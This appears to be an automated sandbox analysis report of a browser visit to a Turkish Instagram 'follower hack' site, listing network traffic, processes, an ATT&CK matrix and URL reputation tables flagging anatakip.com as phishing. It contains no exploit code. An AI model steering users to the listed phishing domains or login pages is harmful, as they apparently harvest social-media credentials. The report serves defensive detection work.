Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: classification engineClassification label: mal88.phis.win@32/119@22/13
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 --field-trial-handle=2180,i,14791946737678668430,15849109549246575421,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://instahilecin.net/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 --field-trial-handle=2180,i,14791946737678668430,15849109549246575421,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Ok
Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Ok
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Drive-by Compromise
Windows Management Instrumentation1
Registry Run Keys / Startup Folder
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://instahilecin.net/100%Avira URL Cloudphishing
https://instahilecin.net/18%VirustotalBrowse
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
www3.l.google.com0%VirustotalBrowse
www.google.com0%VirustotalBrowse
bg.microsoft.map.fastly.net0%VirustotalBrowse
instahilecin.net17%VirustotalBrowse
translate.google.com0%VirustotalBrowse
anatakip.com11%VirustotalBrowse
whos.amung.us0%VirustotalBrowse
instahilecin.com3%VirustotalBrowse
a.nel.cloudflare.com0%VirustotalBrowse
fp2e7a.wpc.phicdn.net0%VirustotalBrowse
widgets.amung.us0%VirustotalBrowse
SourceDetectionScannerLabelLink
http://fontawesome.io0%URL Reputationsafe
https://stats.g.doubleclick.net/g/collect0%URL Reputationsafe
http://www.broofa.com0%URL Reputationsafe
https://developers.google.com/recaptcha/docs/faq#localhost_support0%URL Reputationsafe
https://support.google.com/recaptcha#62627360%URL Reputationsafe
https://ampcid.google.com/v1/publisher:getClientId0%URL Reputationsafe
https://support.google.com/recaptcha/?hl=en#62238280%URL Reputationsafe
https://www.youtube.com/iframe_api0%URL Reputationsafe
https://support.google.com/recaptcha/#61759710%URL Reputationsafe
https://stats.g.doubleclick.net/j/collect0%URL Reputationsafe
https://support.google.com/recaptcha0%URL Reputationsafe
https://recaptcha.net0%URL Reputationsafe
https://tagassistant.google.com/0%URL Reputationsafe
https://www.apache.org/licenses/0%URL Reputationsafe
https://translate.google.com0%URL Reputationsafe
https://cct.google/taggy/agent.js0%URL Reputationsafe
https://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit0%URL Reputationsafe
http://fontawesome.io/license0%URL Reputationsafe
https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que0%URL Reputationsafe
https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-reca0%URL Reputationsafe
https://www.google.%/ads/ga-audiences0%URL Reputationsafe
https://td.doubleclick.net0%URL Reputationsafe
https://www.merchant-center-analytics.goog0%URL Reputationsafe
https://anatakip.com/assets/lightgallery/dist/js/lg-video.min.js100%Avira URL Cloudphishing
https://anatakip.com/assets/style/instastyle.css?v=2.4100%Avira URL Cloudphishing
https://anatakip.com/assets/scripts/fancybox/source/jquery.fancybox.pack.js100%Avira URL Cloudphishing
https://widgets.amung.us/classic/00/56.png0%Avira URL Cloudsafe
https://www.google.com/images/cleardot.gif0%Avira URL Cloudsafe
https://widgets.amung.us/classic/13/1365.png0%Avira URL Cloudsafe
https://anatakip.com/favicon.ico100%Avira URL Cloudphishing
https://a.nel.cloudflare.com/report/v4?s=l9Q2NhKNcmiYuawVkY6%2FFZHGWCkucLEvghjiYGr2K4LS7VB500g%2BPV379t7kj5WUbcYjeBh%2F4F7R3lnu9nfXimYuu4rldEgbjiqW4eUgvo%2FJj3E3uMakhtru3ioehm8%3D0%Avira URL Cloudsafe
https://anatakip.com/assets/lightgallery/dist/js/lightgallery.min.js100%Avira URL Cloudphishing
https://anatakip.com/assets/fonts/fontawesome-webfont.woff2?v=4.6.3100%Avira URL Cloudphishing
https://www.google.com/images/cleardot.gif0%VirustotalBrowse
https://anatakip.com/assets/lightgallery/dist/css/lightgallery.min.css100%Avira URL Cloudphishing
https://www.google.com/support/translate0%Avira URL Cloudsafe
https://widgets.amung.us/classic/13/1391.png0%Avira URL Cloudsafe
about:blank0%Avira URL Cloudsafe
https://widgets.amung.us/classic/00/55.png0%Avira URL Cloudsafe
https://anatakip.com/assets/logo/favicon.png100%Avira URL Cloudphishing
https://anatakip.com/assets/nprogress/nprogress.js100%Avira URL Cloudphishing
https://widgets.amung.us/classic/00/55.png1%VirustotalBrowse
https://cloud.google.com/contact0%Avira URL Cloudsafe
https://www.google.com0%Avira URL Cloudsafe
https://widgets.amung.us/classic/00/53.png0%Avira URL Cloudsafe
https://widgets.amung.us/classic/14/1454.png0%Avira URL Cloudsafe
https://anatakip.com/assets/style/font-awesome.min.css100%Avira URL Cloudphishing
https://www.google.com0%VirustotalBrowse
https://www.google.com/recaptcha/api.js0%Avira URL Cloudsafe
https://www.google.com/support/translate0%VirustotalBrowse
https://widgets.amung.us/classic/13/1398.png0%Avira URL Cloudsafe
https://widgets.amung.us/classic/14/1406.png0%Avira URL Cloudsafe
http://getbootstrap.com)0%Avira URL Cloudsafe
https://www.google.com/recaptcha/api.js0%VirustotalBrowse
https://anatakip.com/assets/style/paper.css?v=v3.1.5100%Avira URL Cloudphishing
https://anatakip.com/assets/nprogress/nprogress.css100%Avira URL Cloudphishing
https://cloud.google.com/contact0%VirustotalBrowse
https://www.google.com/recaptcha/api2/0%Avira URL Cloudsafe
https://widgets.amung.us/classic/14/1405.png0%Avira URL Cloudsafe
https://widgets.amung.us/classic/14/1453.png0%Avira URL Cloudsafe
https://anatakip.com/assets/lazyload/jquery.lazyload.min.js100%Avira URL Cloudphishing
https://widgets.amung.us/classic/13/1371.png0%Avira URL Cloudsafe
about:srcdoc0%Avira URL Cloudsafe
https://a.nel.cloudflare.com/report/v4?s=MSO4u6hhEz8Hcno9nmUVRoQV5Qx3caGuGDqr6nuFxeLRl3IERZafoidcDHs62aIt1%2BPR7owy2Rj94S%2BN%2FWaHXLGCtf3ilabN1y8GWxzZChXxA2zGh%2FsaQuA76w9pEhk%3D0%Avira URL Cloudsafe
https://anatakip.com/assets/jquery/2.2.4/jquery.min.js?v=1100%Avira URL Cloudphishing
https://cloud.google.com/recaptcha-enterprise/billing-information0%Avira URL Cloudsafe
http://bootswatch.com0%Avira URL Cloudsafe
https://anatakip.com/assets/bootstrap/css/bootstrap-paper.min.css100%Avira URL Cloudphishing
http://sachinchoolur.github.io/lightGallery/0%Avira URL Cloudsafe
https://adservice.google.com/pagead/regclk0%Avira URL Cloudsafe
https://www.gstatic.c..?/recaptcha/releases/joHA60MeME-PNviL59xVH9zs/recaptcha__.0%Avira URL Cloudsafe
https://widgets.amung.us/classic/14/1402.png0%Avira URL Cloudsafe
https://play.google.com/log?format=json&hasfast=true0%Avira URL Cloudsafe
https://anatakip.com/ajax/keep-session100%Avira URL Cloudphishing
https://www.google.com/ads/ga-audiences0%Avira URL Cloudsafe
https://whos.amung.us/widget/anatakipx.png0%Avira URL Cloudsafe
https://instahilecin.com/0%Avira URL Cloudsafe
https://anatakip.com/assets/bootstrap/js/bootstrap.min.js100%Avira URL Cloudphishing
https://github.com/twbs/bootstrap/blob/master/LICENSE)0%Avira URL Cloudsafe
https://whos.amung.us/widget/instamark.png0%Avira URL Cloudsafe
https://widgets.amung.us/classic/00/57.png0%Avira URL Cloudsafe
https://anatakip.com/assets/logo/logo.png100%Avira URL Cloudphishing
https://anatakip.com/assets/scripts/fancybox/source/jquery.fancybox.css?v=2.1.5100%Avira URL Cloudphishing
https://anatakip.com/assets/core/core.js?v=3.1.10100%Avira URL Cloudphishing
https://www.google.com/maps/embed/v1/view?key=AIzaSyAT2XRwYXUTETmiIkYvrCg6_CwxtcdpMhI&center=0%Avira URL Cloudsafe
https://widgets.amung.us/classic/14/1431.png0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
anatakip.com
104.21.27.83
truetrueunknown
instahilecin.net
104.21.72.53
truefalseunknown
bg.microsoft.map.fastly.net
199.232.214.172
truefalseunknown
a.nel.cloudflare.com
35.190.80.1
truefalseunknown
www3.l.google.com
142.250.185.142
truefalseunknown
instahilecin.com
104.21.84.90
truefalseunknown
whos.amung.us
104.22.75.171
truefalseunknown
www.google.com
172.217.16.196
truefalseunknown
widgets.amung.us
104.22.74.171
truefalseunknown
fp2e7a.wpc.phicdn.net
192.229.221.95
truefalseunknown
translate.google.com
unknown
unknownfalseunknown
NameMaliciousAntivirus DetectionReputation
https://anatakip.com/assets/lightgallery/dist/js/lg-video.min.jsfalse
  • Avira URL Cloud: phishing
unknown
https://anatakip.com/assets/style/instastyle.css?v=2.4false
  • Avira URL Cloud: phishing
unknown
https://widgets.amung.us/classic/13/1365.pngfalse
  • Avira URL Cloud: safe
unknown
https://anatakip.com/toolsfalse
    unknown
    https://anatakip.com/tools/send-followerfalse
      unknown
      https://instahilecin.net/true
        unknown
        https://anatakip.com/assets/scripts/fancybox/source/jquery.fancybox.pack.jsfalse
        • Avira URL Cloud: phishing
        unknown
        https://widgets.amung.us/classic/00/56.pngfalse
        • Avira URL Cloud: safe
        unknown
        https://anatakip.com/logintrue
          unknown
          https://anatakip.com/favicon.icofalse
          • Avira URL Cloud: phishing
          unknown
          https://anatakip.com/assets/lightgallery/dist/js/lightgallery.min.jsfalse
          • Avira URL Cloud: phishing
          unknown
          https://a.nel.cloudflare.com/report/v4?s=l9Q2NhKNcmiYuawVkY6%2FFZHGWCkucLEvghjiYGr2K4LS7VB500g%2BPV379t7kj5WUbcYjeBh%2F4F7R3lnu9nfXimYuu4rldEgbjiqW4eUgvo%2FJj3E3uMakhtru3ioehm8%3Dfalse
          • Avira URL Cloud: safe
          unknown
          https://anatakip.com/#modalContactfalse
            unknown
            https://anatakip.com/assets/fonts/fontawesome-webfont.woff2?v=4.6.3false
            • Avira URL Cloud: phishing
            unknown
            https://anatakip.com/assets/lightgallery/dist/css/lightgallery.min.cssfalse
            • Avira URL Cloud: phishing
            unknown
            https://widgets.amung.us/classic/13/1391.pngfalse
            • Avira URL Cloud: safe
            unknown
            about:blankfalse
            • Avira URL Cloud: safe
            unknown
            https://widgets.amung.us/classic/00/55.pngfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://anatakip.com/assets/logo/favicon.pngfalse
            • Avira URL Cloud: phishing
            unknown
            https://anatakip.com/packagesfalse
              unknown
              https://anatakip.com/assets/nprogress/nprogress.jsfalse
              • Avira URL Cloud: phishing
              unknown
              https://anatakip.com/#TakipciHilesifalse
                unknown
                https://widgets.amung.us/classic/00/53.pngfalse
                • Avira URL Cloud: safe
                unknown
                https://anatakip.com/true
                  unknown
                  https://widgets.amung.us/classic/14/1454.pngfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://anatakip.com/assets/style/font-awesome.min.cssfalse
                  • Avira URL Cloud: phishing
                  unknown
                  https://www.google.com/recaptcha/api.jsfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://widgets.amung.us/classic/13/1398.pngfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://widgets.amung.us/classic/14/1406.pngfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://anatakip.com/assets/style/paper.css?v=v3.1.5false
                  • Avira URL Cloud: phishing
                  unknown
                  https://anatakip.com/assets/nprogress/nprogress.cssfalse
                  • Avira URL Cloud: phishing
                  unknown
                  https://widgets.amung.us/classic/14/1405.pngfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://widgets.amung.us/classic/14/1453.pngfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://anatakip.com/assets/lazyload/jquery.lazyload.min.jsfalse
                  • Avira URL Cloud: phishing
                  unknown
                  https://widgets.amung.us/classic/13/1371.pngfalse
                  • Avira URL Cloud: safe
                  unknown
                  about:srcdocfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://a.nel.cloudflare.com/report/v4?s=MSO4u6hhEz8Hcno9nmUVRoQV5Qx3caGuGDqr6nuFxeLRl3IERZafoidcDHs62aIt1%2BPR7owy2Rj94S%2BN%2FWaHXLGCtf3ilabN1y8GWxzZChXxA2zGh%2FsaQuA76w9pEhk%3Dfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://anatakip.com/assets/jquery/2.2.4/jquery.min.js?v=1false
                  • Avira URL Cloud: phishing
                  unknown
                  https://anatakip.com/assets/bootstrap/css/bootstrap-paper.min.cssfalse
                  • Avira URL Cloud: phishing
                  unknown
                  https://translate.google.com/translate_a/element.js?cb=googleTranslateElementInitfalse
                  • URL Reputation: safe
                  unknown
                  https://widgets.amung.us/classic/14/1402.pngfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://anatakip.com/blogfalse
                    unknown
                    https://anatakip.com/ajax/keep-sessionfalse
                    • Avira URL Cloud: phishing
                    unknown
                    https://instahilecin.com/false
                    • Avira URL Cloud: safe
                    unknown
                    https://whos.amung.us/widget/anatakipx.pngfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://anatakip.com/assets/bootstrap/js/bootstrap.min.jsfalse
                    • Avira URL Cloud: phishing
                    unknown
                    https://whos.amung.us/widget/instamark.pngfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://widgets.amung.us/classic/00/57.pngfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://anatakip.com/assets/logo/logo.pngfalse
                    • Avira URL Cloud: phishing
                    unknown
                    https://anatakip.com/assets/scripts/fancybox/source/jquery.fancybox.css?v=2.1.5false
                    • Avira URL Cloud: phishing
                    unknown
                    https://anatakip.com/assets/core/core.js?v=3.1.10false
                    • Avira URL Cloud: phishing
                    unknown
                    https://widgets.amung.us/classic/14/1431.pngfalse
                    • Avira URL Cloud: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://fontawesome.iochromecache_186.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://stats.g.doubleclick.net/g/collectchromecache_188.2.drfalse
                    • URL Reputation: safe
                    unknown
                    http://www.broofa.comchromecache_164.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://developers.google.com/recaptcha/docs/faq#localhost_supportchromecache_183.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://www.google.com/images/cleardot.gifchromecache_164.2.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://support.google.com/recaptcha#6262736chromecache_183.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://www.google.com/support/translatechromecache_164.2.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://ampcid.google.com/v1/publisher:getClientIdchromecache_201.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://support.google.com/recaptcha/?hl=en#6223828chromecache_183.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://cloud.google.com/contactchromecache_183.2.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.google.comchromecache_188.2.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.youtube.com/iframe_apichromecache_188.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://support.google.com/recaptcha/#6175971chromecache_183.2.drfalse
                    • URL Reputation: safe
                    unknown
                    http://getbootstrap.com)chromecache_206.2.dr, chromecache_165.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://stats.g.doubleclick.net/j/collectchromecache_201.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://www.google.com/recaptcha/api2/chromecache_205.2.dr, chromecache_183.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://support.google.com/recaptchachromecache_183.2.drfalse
                    • URL Reputation: safe
                    unknown
                    http://bootswatch.comchromecache_206.2.drfalse
